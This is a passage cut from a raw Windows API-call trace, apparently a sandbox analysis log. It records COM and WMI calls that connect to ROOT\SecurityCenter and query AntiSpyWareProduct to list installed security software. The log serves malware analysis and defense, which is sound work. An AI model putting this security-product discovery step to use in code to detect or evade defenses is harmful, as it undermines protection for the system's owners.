Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ea8c | out: ppvObject=0x38ea8c*=0x5642910) returned 0x0 [0235.004] WbemLocator:IUnknown:QueryInterface (in: This=0x5642910, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38ea40 | out: ppvObject=0x38ea40*=0x0) returned 0x80004002 [0235.005] WbemLocator:IUnknown:AddRef (This=0x5642910) returned 0x3 [0235.005] WbemLocator:IUnknown:QueryInterface (in: This=0x5642910, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e39c | out: ppvObject=0x38e39c*=0x0) returned 0x80004002 [0235.005] WbemLocator:IUnknown:QueryInterface (in: This=0x5642910, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e34c | out: ppvObject=0x38e34c*=0x0) returned 0x80004002 [0235.005] WbemLocator:IUnknown:QueryInterface (in: This=0x5642910, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e358 | out: ppvObject=0x38e358*=0x0) returned 0x80004002 [0235.005] CoGetContextToken (in: pToken=0x38e3b8 | out: pToken=0x38e3b8) returned 0x0 [0235.005] CoGetContextToken (in: pToken=0x38e7cc | out: pToken=0x38e7cc) returned 0x0 [0235.005] WbemLocator:IUnknown:QueryInterface (in: This=0x5642910, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e84c | out: ppvObject=0x38e84c*=0x0) returned 0x80004002 [0235.005] WbemLocator:IUnknown:Release (This=0x5642910) returned 0x2 [0235.005] WbemLocator:IUnknown:Release (This=0x5642910) returned 0x1 [0235.005] CoGetContextToken (in: pToken=0x38ee4c | out: pToken=0x38ee4c) returned 0x0 [0235.005] CoGetContextToken (in: pToken=0x38edac | out: pToken=0x38edac) returned 0x0 [0235.005] WbemLocator:IUnknown:QueryInterface (in: This=0x5642910, riid=0x38ee7c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38ee78 | out: ppvObject=0x38ee78*=0x5642910) returned 0x0 [0235.005] WbemLocator:IUnknown:AddRef (This=0x5642910) returned 0x3 [0235.005] WbemLocator:IUnknown:Release (This=0x5642910) returned 0x2 [0235.005] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x56443e8, puCount=0x38f008 | out: puCount=0x38f008*=0x2) returned 0x0 [0235.005] WbemDefPath:IWbemPath:GetText (in: This=0x56443e8, lFlags=8, puBuffLength=0x38f004*=0x0, pszText=0x0 | out: puBuffLength=0x38f004*=0x18, pszText=0x0) returned 0x0 [0235.005] WbemDefPath:IWbemPath:GetText (in: This=0x56443e8, lFlags=8, puBuffLength=0x38f004*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x38f004*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0235.005] CoCreateInstance (in: rclsid=0x6d5f3734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d5f3794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x38eea0 | out: ppv=0x38eea0*=0x5642890) returned 0x0 [0235.005] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5642890, strNetworkResource="\\\\.\\ROOT\\SecurityCenter", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x38ef54 | out: ppNamespace=0x38ef54*=0x563f958) returned 0x0 [0235.250] WbemLocator:IUnknown:QueryInterface (in: This=0x563f958, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38edc4 | out: ppvObject=0x38edc4*=0x55c534c) returned 0x0 [0235.250] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x55c534c, pProxy=0x563f958, pAuthnSvc=0x38ee14, pAuthzSvc=0x38ee10, pServerPrincName=0x38ee08, pAuthnLevel=0x38ee0c, pImpLevel=0x38edfc, pAuthInfo=0x38ee00, pCapabilites=0x38ee04 | out: pAuthnSvc=0x38ee14*=0xa, pAuthzSvc=0x38ee10*=0x0, pServerPrincName=0x38ee08, pAuthnLevel=0x38ee0c*=0x6, pImpLevel=0x38edfc*=0x2, pAuthInfo=0x38ee00, pCapabilites=0x38ee04*=0x1) returned 0x0 [0235.250] WbemLocator:IUnknown:Release (This=0x55c534c) returned 0x1 [0235.250] WbemLocator:IUnknown:QueryInterface (in: This=0x563f958, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38edb8 | out: ppvObject=0x38edb8*=0x55c536c) returned 0x0 [0235.250] WbemLocator:IUnknown:QueryInterface (in: This=0x563f958, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eda4 | out: ppvObject=0x38eda4*=0x55c534c) returned 0x0 [0235.250] WbemLocator:IClientSecurity:SetBlanket (This=0x55c534c, pProxy=0x563f958, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0235.250] WbemLocator:IUnknown:Release (This=0x55c534c) returned 0x2 [0235.250] WbemLocator:IUnknown:Release (This=0x55c536c) returned 0x1 [0235.250] CoTaskMemFree (pv=0x55fec18) [0235.251] WbemLocator:IUnknown:AddRef (This=0x563f958) returned 0x2 [0235.251] WbemLocator:IUnknown:Release (This=0x5642890) returned 0x0 [0235.251] CoGetContextToken (in: pToken=0x38e2f8 | out: pToken=0x38e2f8) returned 0x0 [0235.251] CoGetContextToken (in: pToken=0x38e70c | out: pToken=0x38e70c) returned 0x0 [0235.251] WbemLocator:IUnknown:QueryInterface (in: This=0x563f958, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e6a4 | out: ppvObject=0x38e6a4*=0x55c5354) returned 0x0 [0235.251] WbemLocator:IRpcOptions:Query (in: This=0x55c5354, pPrx=0x563aad0, dwProperty=2, pdwValue=0x38e798 | out: pdwValue=0x38e798) returned 0x80004002 [0235.251] WbemLocator:IUnknown:Release (This=0x55c5354) returned 0x2 [0235.252] CoGetContextToken (in: pToken=0x38ecdc | out: pToken=0x38ecdc) returned 0x0 [0235.252] CoGetContextToken (in: pToken=0x38ec3c | out: pToken=0x38ec3c) returned 0x0 [0235.252] WbemLocator:IUnknown:QueryInterface (in: This=0x563f958, riid=0x38ed0c*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x38ebd8 | out: ppvObject=0x38ebd8*=0x563f958) returned 0x0 [0235.252] WbemLocator:IUnknown:Release (This=0x563f958) returned 0x2 [0235.252] SysStringLen (param_1=0x0) returned 0x0 [0235.252] CoGetContextToken (in: pToken=0x38ee0c | out: pToken=0x38ee0c) returned 0x0 [0235.252] IWbemServices:ExecQuery (in: This=0x563f958, strQueryLanguage="WQL", strQuery="SELECT * FROM AntiSpyWareProduct", lFlags=16, pCtx=0x0, ppEnum=0x38f014 | out: ppEnum=0x38f014*=0x544efd0) returned 0x0 [0235.254] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee6c | out: ppvObject=0x38ee6c*=0x544efd4) returned 0x0 [0235.254] IClientSecurity:QueryBlanket (in: This=0x544efd4, pProxy=0x544efd0, pAuthnSvc=0x38eebc, pAuthzSvc=0x38eeb8, pServerPrincName=0x38eeb0, pAuthnLevel=0x38eeb4, pImpLevel=0x38eea4, pAuthInfo=0x38eea8, pCapabilites=0x38eeac | out: pAuthnSvc=0x38eebc*=0xa, pAuthzSvc=0x38eeb8*=0x0, pServerPrincName=0x38eeb0, pAuthnLevel=0x38eeb4*=0x6, pImpLevel=0x38eea4*=0x2, pAuthInfo=0x38eea8, pCapabilites=0x38eeac*=0x1) returned 0x0 [0235.254] IUnknown:Release (This=0x544efd4) returned 0x1 [0235.254] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee60 | out: ppvObject=0x38ee60*=0x55c4bec) returned 0x0 [0235.254] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee4c | out: ppvObject=0x38ee4c*=0x544efd4) returned 0x0 [0235.254] IClientSecurity:SetBlanket (This=0x544efd4, pProxy=0x544efd0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0235.256] IUnknown:Release (This=0x544efd4) returned 0x2 [0235.256] WbemLocator:IUnknown:Release (This=0x55c4bec) returned 0x1 [0235.256] CoTaskMemFree (pv=0x55fecd8) [0235.257] IUnknown:AddRef (This=0x544efd0) returned 0x2 [0235.257] CoGetContextToken (in: pToken=0x38e38c | out: pToken=0x38e38c) returned 0x0 [0235.257] CoGetContextToken (in: pToken=0x38e79c | out: pToken=0x38e79c) returned 0x0 [0235.257] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x55c4bd4) returned 0x0 [0235.257] WbemLocator:IRpcOptions:Query (in: This=0x55c4bd4, pPrx=0x563ab18, dwProperty=2, pdwValue=0x38e82c | out: pdwValue=0x38e82c) returned 0x80004002 [0235.257] WbemLocator:IUnknown:Release (This=0x55c4bd4) returned 0x2 [0235.257] CoGetContextToken (in: pToken=0x38ed6c | out: pToken=0x38ed6c) returned 0x0 [0235.257] CoGetContextToken (in: pToken=0x38eccc | out: pToken=0x38eccc) returned 0x0 [0235.257] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x38ed9c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x38ec68 | out: ppvObject=0x38ec68*=0x544efd0) returned 0x0 [0235.258] IUnknown:Release (This=0x544efd0) returned 0x2 [0235.258] SysStringLen (param_1=0x0) returned 0x0 [0235.258] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x56443e8, puCount=0x38f060 | out: puCount=0x38f060*=0x2) returned 0x0 [0235.258] WbemDefPath:IWbemPath:GetText (in: This=0x56443e8, lFlags=4, puBuffLength=0x38f05c*=0x0, pszText=0x0 | out: puBuffLength=0x38f05c*=0x18, pszText=0x0) returned 0x0 [0235.258] WbemDefPath:IWbemPath:GetText (in: This=0x56443e8, lFlags=4, puBuffLength=0x38f05c*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x38f05c*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0235.258] CoGetContextToken (in: pToken=0x38eeb4 | out: pToken=0x38eeb4) returned 0x0 [0235.258] IEnumWbemClassObject:Clone (in: This=0x544efd0, ppEnum=0x38f06c | out: ppEnum=0x38f06c*=0x544f098) returned 0x0 [0235.259] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ef28 | out: ppvObject=0x38ef28*=0x544f09c) returned 0x0 [0235.259] IClientSecurity:QueryBlanket (in: This=0x544f09c, pProxy=0x544f098, pAuthnSvc=0x38ef78, pAuthzSvc=0x38ef74, pServerPrincName=0x38ef6c, pAuthnLevel=0x38ef70, pImpLevel=0x38ef60, pAuthInfo=0x38ef64, pCapabilites=0x38ef68 | out: pAuthnSvc=0x38ef78*=0xa, pAuthzSvc=0x38ef74*=0x0, pServerPrincName=0x38ef6c, pAuthnLevel=0x38ef70*=0x6, pImpLevel=0x38ef60*=0x2, pAuthInfo=0x38ef64, pCapabilites=0x38ef68*=0x1) returned 0x0 [0235.259] IUnknown:Release (This=0x544f09c) returned 0x1 [0235.259] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ef1c | out: ppvObject=0x38ef1c*=0x55c554c) returned 0x0 [0235.259] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ef08 | out: ppvObject=0x38ef08*=0x544f09c) returned 0x0 [0235.259] IClientSecurity:SetBlanket (This=0x544f09c, pProxy=0x544f098, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0235.261] IUnknown:Release (This=0x544f09c) returned 0x2 [0235.261] WbemLocator:IUnknown:Release (This=0x55c554c) returned 0x1 [0235.261] CoTaskMemFree (pv=0x55fed08) [0235.261] IUnknown:AddRef (This=0x544f098) returned 0x2 [0235.261] CoGetContextToken (in: pToken=0x38e438 | out: pToken=0x38e438) returned 0x0 [0235.261] CoGetContextToken (in: pToken=0x38e84c | out: pToken=0x38e84c) returned 0x0 [0235.261] IUnknown:QueryInterface (in: This=0x544f098, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e7e4 | out: ppvObject=0x38e7e4*=0x55c5534) returned 0x0 [0235.261] WbemLocator:IRpcOptions:Query (in: This=0x55c5534, pPrx=0x563aba8, dwProperty=2, pdwValue=0x38e8d8 | out: pdwValue=0x38e8d8) returned 0x80004002 [0235.262] WbemLocator:IUnknown:Release (This=0x55c5534) returned 0x2 [0235.262] CoGetContextToken (in: pToken=0x38ee1c | out: pToken=0x38ee1c) returned 0x0 [0235.262] CoGetContextToken (in: pToken=0x38ed7c | out: pToken=0x38ed7c) returned 0x0 [0235.262] IUnknown:QueryInterface (in: This=0x544f098, riid=0x38ee4c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x38ed18 | out: ppvObject=0x38ed18*=0x544f098) returned 0x0 [0235.262] IUnknown:Release (This=0x544f098) returned 0x2 [0235.262] SysStringLen (param_1=0x0) returned 0x0 [0235.262] IEnumWbemClassObject:Reset (This=0x544f098) returned 0x0 [0235.263] CoTaskMemAlloc (cb=0x4) returned 0x5642980 [0235.263] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5642980, puReturned=0x266b538 | out: apObjects=0x5642980*=0x0, puReturned=0x266b538*=0x0) returned 0x1 [0235.263] CoTaskMemFree (pv=0x5642980) [0235.263] CoGetContextToken (in: pToken=0x38ef90 | out: pToken=0x38ef90) returned 0x0 [0235.263] IUnknown:Release (This=0x544f098) returned 0x1 [0235.264] IUnknown:Release (This=0x544f098) returned 0x0 [0235.264] CoGetContextToken (in: pToken=0x38ef90 | out: pToken=0x38ef90) returned 0x0 [0235.264] IUnknown:Release (This=0x544efd0) returned 0x1 [0235.264] IUnknown:Release (This=0x544efd0) returned 0x0 [0235.265] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38f088 | out: ppv=0x38f088*=0x6d0cac) returned 0x0 [0235.265] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38f080 | out: pAptType=0x38f080*=1) returned 0x0 [0235.265] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38f084 | out: ppvObject=0x38f084*=0x0) returned 0x80004002 [0235.265] IUnknown:Release (This=0x6d0cac) returned 0x1 [0235.267] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e9f0 | out: ppv=0x38e9f0*=0x5642980) returned 0x0 [0235.267] WbemDefPath:IUnknown:QueryInterface (in: This=0x5642980, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38ec08 | out: ppvObject=0x38ec08*=0x0) returned 0x80004002 [0235.267] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5642980, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ec14 | out: ppvObject=0x38ec14*=0x5644458) returned 0x0 [0235.267] WbemDefPath:IUnknown:Release (This=0x5642980) returned 0x0 [0235.267] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644458, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e834 | out: ppvObject=0x38e834*=0x5644458) returned 0x0 [0235.267] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644458, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e7e8 | out: ppvObject=0x38e7e8*=0x0) returned 0x80004002 [0235.268] WbemDefPath:IUnknown:AddRef (This=0x5644458) returned 0x3 [0235.268] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644458, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e144 | out: ppvObject=0x38e144*=0x0) returned 0x80004002 [0235.268] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644458, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e0f4 | out: ppvObject=0x38e0f4*=0x0) returned 0x80004002 [0235.268] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644458, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e100 | out: ppvObject=0x38e100*=0x5642940) returned 0x0 [0235.268] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5642940, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e108 | out: pCid=0x38e108*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0235.268] WbemDefPath:IUnknown:Release (This=0x5642940) returned 0x3 [0235.268] CoGetContextToken (in: pToken=0x38e160 | out: pToken=0x38e160) returned 0x0 [0235.268] CoGetContextToken (in: pToken=0x38e574 | out: pToken=0x38e574) returned 0x0 [0235.268] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644458, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e5f4 | out: ppvObject=0x38e5f4*=0x0) returned 0x80004002 [0235.268] WbemDefPath:IUnknown:Release (This=0x5644458) returned 0x2 [0235.268] WbemDefPath:IUnknown:Release (This=0x5644458) returned 0x1 [0235.268] CoGetContextToken (in: pToken=0x38ef0c | out: pToken=0x38ef0c) returned 0x0 [0235.268] CoGetContextToken (in: pToken=0x38ee6c | out: pToken=0x38ee6c) returned 0x0 [0235.268] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644458, riid=0x38ef3c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ef38 | out: ppvObject=0x38ef38*=0x5644458) returned 0x0 [0235.268] WbemDefPath:IUnknown:AddRef (This=0x5644458) returned 0x3 [0235.268] WbemDefPath:IUnknown:Release (This=0x5644458) returned 0x2 [0235.268] WbemDefPath:IWbemPath:SetText (This=0x5644458, uMode=0x4, pszPath="ROOT\\SecurityCenter") returned 0x0 [0235.269] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644458, puCount=0x38f0b0 | out: puCount=0x38f0b0*=0x2) returned 0x0 [0235.269] WbemDefPath:IWbemPath:GetText (in: This=0x5644458, lFlags=4, puBuffLength=0x38f0ac*=0x0, pszText=0x0 | out: puBuffLength=0x38f0ac*=0x18, pszText=0x0) returned 0x0 [0235.269] WbemDefPath:IWbemPath:GetText (in: This=0x5644458, lFlags=4, puBuffLength=0x38f0ac*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x38f0ac*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0235.269] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644458, puCount=0x38f09c | out: puCount=0x38f09c*=0x2) returned 0x0 [0235.269] WbemDefPath:IWbemPath:GetText (in: This=0x5644458, lFlags=4, puBuffLength=0x38f098*=0x0, pszText=0x0 | out: puBuffLength=0x38f098*=0x18, pszText=0x0) returned 0x0 [0235.269] WbemDefPath:IWbemPath:GetText (in: This=0x5644458, lFlags=4, puBuffLength=0x38f098*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x38f098*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0235.269] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38f02c | out: ppv=0x38f02c*=0x6d0cac) returned 0x0 [0235.269] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38f024 | out: pAptType=0x38f024*=1) returned 0x0 [0235.269] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38f028 | out: ppvObject=0x38f028*=0x0) returned 0x80004002 [0235.269] IUnknown:Release (This=0x6d0cac) returned 0x1 [0235.270] CoGetClassObject (in: rclsid=0x55b3f8c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38ec48 | out: ppv=0x38ec48*=0x563abc0) returned 0x0 [0235.270] WbemLocator:IUnknown:QueryInterface (in: This=0x563abc0, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38ee60 | out: ppvObject=0x38ee60*=0x0) returned 0x80004002 [0235.270] WbemLocator:IClassFactory:CreateInstance (in: This=0x563abc0, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee6c | out: ppvObject=0x38ee6c*=0x5642970) returned 0x0 [0235.270] WbemLocator:IUnknown:Release (This=0x563abc0) returned 0x0 [0235.270] WbemLocator:IUnknown:QueryInterface (in: This=0x5642970, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ea8c | out: ppvObject=0x38ea8c*=0x5642970) returned 0x0 [0235.270] WbemLocator:IUnknown:QueryInterface (in: This=0x5642970, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38ea40 | out: ppvObject=0x38ea40*=0x0) returned 0x80004002 [0235.271] WbemLocator:IUnknown:AddRef (This=0x5642970) returned 0x3 [0235.271] WbemLocator:IUnknown:QueryInterface (in: This=0x5642970, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, 